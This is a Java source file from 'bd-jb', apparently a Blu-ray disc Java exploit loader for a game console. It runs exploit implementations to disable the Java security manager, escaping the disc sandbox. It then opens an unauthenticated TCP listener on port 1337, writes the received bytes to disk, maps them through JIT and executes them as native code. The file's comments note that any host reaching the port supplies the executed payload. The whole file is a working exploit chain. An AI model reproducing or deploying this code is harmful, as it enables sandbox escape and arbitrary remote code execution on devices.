/*
* Copyright (C) 2021 Andy Nguyen
*
* This software may be modified and distributed under the terms
* of the MIT license. See the LICENSE file for details.
*/
package com.bdjb;
import java.io.FileOutputStream;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.InetAddress;
import java.net.ServerSocket;
import java.net.Socket;
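/**
 * Entry point of the bd-jb loader: it first tries to remove the Java security manager and then
 * receives a native payload over TCP, writes it to disk, maps it and calls it.
 *
 * <p>{@code init()} runs each {@code ExploitInterface} implementation in turn until {@code
 * System.getSecurityManager()} returns {@code null}. {@code start()} runs {@code run()} on a new
 * thread; {@code run()} does nothing while a security manager is still installed.
 *
 * <p>Security note for anyone running or auditing this: the listener is created with {@code new
 * ServerSocket(port)}, which binds every local interface, and nothing in this class authenticates
 * the peer or checks the size or integrity of what it sends. The first host that connects to the
 * port supplies the bytes that are subsequently mapped and called, so the device should only be
 * reachable from a trusted network segment while the listener is waiting.
 */
class Exploit implements Runnable {
  /** TCP port on which the payload is accepted; also shown in the on-screen message. */
  private static final int PAYLOAD_PORT = 1337;

  /** File the received payload is written to and later mapped from. */
  private static final String PAYLOAD_PATH = "/OS/HDD/download0/mnt_ada/payload.bin";

  /**
   * Tries the available {@code ExploitInterface} implementations until the security manager is
   * gone, and prints an error if it is still installed afterwards.
   */
  static void init() {
    Screen.println("[+] bd-jb by theflow");

    Screen.println("[*] Disabling security manager...");

    ExploitInterface[] exploits =
        new ExploitInterface[] {new ExploitUserPrefsImpl(), new ExploitServiceProxyImpl()};

    for (int i = 0; i < exploits.length; i++) {
      try {
        exploits[i].trigger();
        if (System.getSecurityManager() == null) {
          break;
        }
      } catch (Exception e) {
        // Deliberate best effort: a failing implementation just means the next one is tried.
        // The outcome is reported once, below, from the security manager state.
        continue;
      }
    }

    if (System.getSecurityManager() != null) {
      Screen.println("[-] Error could not disable security manager.");
    }
  }

  /** Runs the loader on a new thread so the caller is not blocked by the network wait. */
  static void start() {
    new Thread(new Exploit()).start();
  }

  /**
   * Installs the native helpers, waits for one payload on {@code PAYLOAD_PORT}, then maps and calls
   * it. Any exception is reported on screen and ends the run.
   */
  public void run() {
    // Nothing below can work inside the sandbox, so stop if init() did not succeed.
    if (System.getSecurityManager() != null) {
      return;
    }

    try {
      Screen.println("[*] Installing native API...");
      API api = API.getInstance();

      Screen.println("[*] Enabling JIT...");
      JIT jit = JIT.getInstance();

      // The port in the message comes from the same constant as the bind, so they cannot drift.
      Screen.println(
          "[*] Listening for payload on "
              + InetAddress.getLocalHost().getHostAddress()
              + ":"
              + PAYLOAD_PORT
              + "...");

      receivePayload(PAYLOAD_PATH);

      Screen.println("[*] Mapping payload...");
      // NOTE(review): the meaning of the 0x4000 argument is defined by JIT.mapPayload, which is
      // not visible here - confirm against that class.
      long payload = jit.mapPayload(PAYLOAD_PATH, 0x4000);
      Screen.println("[+] payload: " + Long.toHexString(payload));

      Screen.println("[*] Executing payload...");
      // The payload is called with one argument, the resolved address of sceKernelDlsym; the
      // returned value is truncated to int for display.
      int ret = (int) api.call(payload, api.dlsym(API.LIBKERNEL_MODULE_HANDLE, "sceKernelDlsym"));
      Screen.println("[+] Result: " + ret);
    } catch (Exception e) {
      Screen.println("[-] Error: " + e.getMessage());
    }
  }

  /**
   * Accepts a single TCP connection on {@code PAYLOAD_PORT} and copies everything the peer sends
   * into {@code path} until the peer closes the stream.
   *
   * <p>The listening socket, the connection and both streams are released on every exit path, so
   * the port does not stay bound while the payload runs and no handle leaks when the transfer
   * fails part-way.
   *
   * @param path file to create or overwrite with the received bytes
   * @throws java.io.IOException if binding, accepting, reading or writing fails
   */
  private static void receivePayload(String path) throws java.io.IOException {
    ServerSocket serverSocket = null;
    Socket socket = null;
    InputStream inputStream = null;
    OutputStream outputStream = null;

    try {
      serverSocket = new ServerSocket(PAYLOAD_PORT);
      socket = serverSocket.accept();

      Screen.println("[*] Downloading payload...");

      inputStream = socket.getInputStream();
      outputStream = new FileOutputStream(path);

      byte[] buf = new byte[8192];
      int read;
      while ((read = inputStream.read(buf)) > 0) {
        outputStream.write(buf, 0, read);
      }

      // Close the file on the success path so a failed close is reported to the caller instead
      // of a truncated file being mapped; the second close in finally is then a no-op.
      outputStream.close();
    } finally {
      // Best-effort cleanup: a failure here must not hide the exception that brought us here.
      if (outputStream != null) {
        try {
          outputStream.close();
        } catch (java.io.IOException ignored) {
          // nothing useful to do
        }
      }
      if (inputStream != null) {
        try {
          inputStream.close();
        } catch (java.io.IOException ignored) {
          // nothing useful to do
        }
      }
      if (socket != null) {
        try {
          socket.close();
        } catch (java.io.IOException ignored) {
          // nothing useful to do
        }
      }
      if (serverSocket != null) {
        try {
          serverSocket.close();
        } catch (java.io.IOException ignored) {
          // nothing useful to do
        }
      }
    }
  }
}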